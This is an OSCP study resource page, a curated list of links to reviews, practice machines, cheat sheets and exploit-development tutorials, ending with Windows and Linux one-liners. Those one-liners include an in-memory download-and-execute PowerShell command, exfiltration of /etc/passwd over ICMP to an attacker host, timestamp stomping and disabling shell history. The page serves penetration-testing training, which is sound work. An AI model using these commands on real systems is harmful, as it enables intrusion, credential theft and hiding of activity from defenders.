Need help with OSCP-Archives?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

560 Stars 198 Forks 30 Commits 0 Opened issues


An archive of everything related to OSCP

Services available


Need anything else?

Contributors list

# 606,367
26 commits
# 1,667
1 commit
# 721,751
1 commit


During my journey to getting the OSCP, I always come across many articles, Git repo, videos, and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great, I wanted to also build a curated list of the resources that I've collected overtime, all in one area for everyone to access.

This list will continue to grow over time as I come across new resources. If you know more resources or want me to add yours, please let me know and I'll add it in.

PS. A VERY big thank you to all the authors of these resources, for taking the time and energy putting this invaluable information together.


~ Official Exam Guide ~

OSCP Certification Exam Guide
- Offensive Security

~ Reviews and Experiences ~

31 Days of OSCP Experience
- ParanoidNinja

Detailed Guide on OSCP Prep – From Newbie to OSCP
- Ramkisan Mohan

Offensive Security Certified Professional – Lab and Exam Review
- theslickgeek

Passing The OSCP
- Pink_Panther

OSCP Experience and the first torture!
- Nitesh Shilpkar

~ Helpful VMs for Practice ~

- loneferret

OSCP-like Vulnhub VMs
- abatchy

OSCP Training VM’s hosted on
- Andrew Hilton

Pinky's Palace CTFs
- Pink_Panther

Hack The Box OSCP-like VMs
- Tony

~ CTF Walkthroughs & Educational Videos ~

Hack The Box CTFs
- ippsec

Search Ippsec's Videos for Specific Topics
- ippsec

Hack The Box, Over The Wire, Other CTFs
- derekrook

VunHub Walkthroughs
- Arr0way

~ OSCP Prep, Tools, Cheatsheets, Guides, etc. ~

Metasploit Unleashed
- Offensive Security

15 Ways to Download a File
- NetSPI

Explain Shell - Great at explaining Linux Commands in Detail
- Idan Kamara

Mixed Archives
- g0tmi1k

OWASP Testing Guide v4 Table of Contents
- owasp

Penetration Testing Tools Cheat Sheet
- Arr0way

Reverse Shell Cheat Sheet
- Arr0way

Linux Commands Cheat Sheet
- Arr0way

Reverse Shell Cheat Sheet
- Pentest Monkey

Black Room Sec - CTFs, Guides, Tools
- blackroomsec

Dostoevskylabs's PenTest Notes
- Dostoevskylabs

Pentest Compilation
- adon90

- danielmiessler

- burntmybagel

- rhodejo

OSCP Scripts
- garyhooks

OSCP Scripts & Documents
- ihack4falafel

OSCP Recon Script
- xapax

- OlivierLaflamme

- rewardone

- slyth11907

OSCP tricks
- WarLord

- WarLord

How to prepare for the OSCP ? A STUDY PLAN

OSCP useful Links
- backdoorshell

Total OSCP Guide
- sushant747

OSCP Course & Exam Preparation
- 411Hall

OSCP Journey: Python Code Challenges
- Elias Ibrahim

SMB Enumeration Checklist
- 0xdf

Tunneling and Pivoting
- 0xdf

Tunneling and Port Forwarding
- HackTricks

Post-Exploitation Windows File Transfers with SMB
- 0xdf

Multiple Ways to Exploit Tomcat Manager
- Raj Chande

PHP Web Shell
- WhiteWinterWolf

Msfvenom Cheat Sheet
- LucianNitescu

Linux Shells
- HackTricks

Windows Shells
- HackTricks

Dumping Clear-Text Credentials
- Pentestlab

OSCP Exam Report Template in Markdown
- noraj

OSCP Omnibus
- alexiasa

~ Brute Force ~

Brute Force - CheatSheet
- HackTricks

~ Checklists ~

Checklist - Linux Privilege Escalation
- HackTricks

Checklist - Local Windows Privilege Escalation
- HackTricks

~ SQL Injection ~

Preliminary SQL Injection Part 1
- Jatin Yadav

Preliminary SQL Injection Part 2
- Jatin Yadav

Informix SQL Injection Cheat Sheet
- pentestmonkey

MSSQL Injection Cheat Sheet
- pentestmonkey

Oracle SQL Injection Cheat Sheet
- pentestmonkey

MySQL SQL Injection Cheat Sheet
- pentestmonkey

Postgres SQL Injection Cheat Sheet
- pentestmonkey

DB2 SQL Injection Cheat Sheet
- pentestmonkey

Ingres SQL Injection Cheat Sheet
- pentestmonkey

SQL Injection Reference Library & Techniques
- SQLINjection

~ Linux Privilege Escalation ~

OSCP - Linux Priviledge Escalation
- WarLord

Basic Linux Privilege Escalation
- g0tmi1k

Linux Priv escalation
- carlospolop

Linux Privilege Escalation
- HackTricks

~ Windows Privilege Escalation ~

OSCP - Windows Priviledge Escalation
- WarLord

- enddo

Windows Priv escalation
- kyawthiha7

Windows Privilege Escalation Fundamentals
- FuzzySec (b33f)

Windows Priv escalation
- carlospolop

Windows Local Privilege Escalation
- HackTricks

~ LFI & RFI ~

PHP Local and Remote File Inclusion (LFI, RFI) Attacks
- WarLord

LFI Cheat Sheet
- Arr0way

~ Exploits & Exploit Developtment, Tutorials ~

Windows & Linux Exploit Development
- FuzzySec (b33f)

Exploit DB
- Offensive Security

Exploit Development - Starting from Part 1
- Corelan Team

Over The Wire - Wargames
- OverTheWire

Unix Privilege Escalation Exploits
- Kabot

~ Windows & linux Kernel Exploits ~

Windows Kernel Exploits
- SecWiki

Linux Kernel Exploits
- lucyoa


Windows Exploit Development – Part 1: The Basics

Windows Exploit Development – Part 2: Intro-Stack-Overflow

Windows Exploit Development – Part 3: Changing-Offsets-and-Rebased-Modules

Windows Exploit Development – Part 4: Locating-Shellcode-Jumps

Windows Exploit Development – Part 5: Locating-Shellcode-Egghunting

Windows Exploit Development – Part 6: Seh-Exploits

Windows Exploit Development – Part 7: Unicode-Buffer-Overflows


Zero Day Zen Garden: Windows Exploit Development - Part 0 [Dev Setup & Advice]

Zero Day Zen Garden: Windows Exploit Development - Part 1 [Stack Buffer Overflow Intro]

Zero Day Zen Garden: Windows Exploit Development - Part 2 [JMP to Locate Shellcode]

Zero Day Zen Garden: Windows Exploit Development - Part 3 [Egghunter to Locate Shellcode]

Zero Day Zen Garden: Windows Exploit Development - Part 4 [Overwriting SEH with Buffer Overflows]

Zero Day Zen Garden: Windows Exploit Development - Part 5 [Return Oriented Programming Chains]

~ Windows One-Liners ~ kindredsec

Obtain Permission String from All Services

sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul

Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths

sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul

Forward traffic to an internal host

netsh interface portproxy add v4tov4 listenport=*port* listenaddress=*ip* connectport=*port* connectaddress=*ip

Download and execute a remote PowerShell script (all in-memory)

iex (New-Object Net.Webclient).DownloadString('*remote_file*')

Check the permissions of all binaries associated with services

$list = Get-WmiObject win32_service | select -ExpandProperty PathName | Select-String -NotMatch svchost; foreach ( $path in $list ) { icacls $path 2>null | Select-String -NotMatch "Successfully processed" }

Enable RDP (may also need firewall rule)

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

~ Linux One-Liners ~ kindredsec

Stomp a timestamp to match other install-time files

touch -a -m -t $(stat -c '%y' /bin/bash | cut -d ":" -f 1,2 | sed 's/[- :]//g')

Prevent ran bash commands from being written to a history file

export HISTFILE=/dev/null

Exfiltrate users over ICMP

while read line; do ping -c 1 -p $(echo "$line" | cut -d ":" -f 1,2,3,7 | xxd -ps) my_attacking_host; done < /etc/passwd

Locate mySQL credentials within web files

egrep -ri '(mysql_connect\(|mysqli_connect\(|new mysqli\(|PDO\(\"mysql:)' /var/www/* 2> /dev/null

List all the SUID Binaries on a System

find / -perm -4000 2>/dev/null

Creates iptables rules to transparently route traffic destined to a specific port to an internal host

iptables -t nat -A PREROUTING -i *interface* -p tcp --dport *port* -j DNAT --to-destination *remote_ip_address* & iptables -t nat -A POSTROUTING -o *interface* -p tcp --dport *port* -d *remote_ip_address* -j SNAT --to-source *local_ip_address*

List all running processes being ran by users other than your current one

ps -elf | grep -v $(whoami)

List all system cronjobs

for i in d hourly daily weekly monthly; do echo; echo "--cron.$i--"; ls -l /etc/cron.$i; done

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.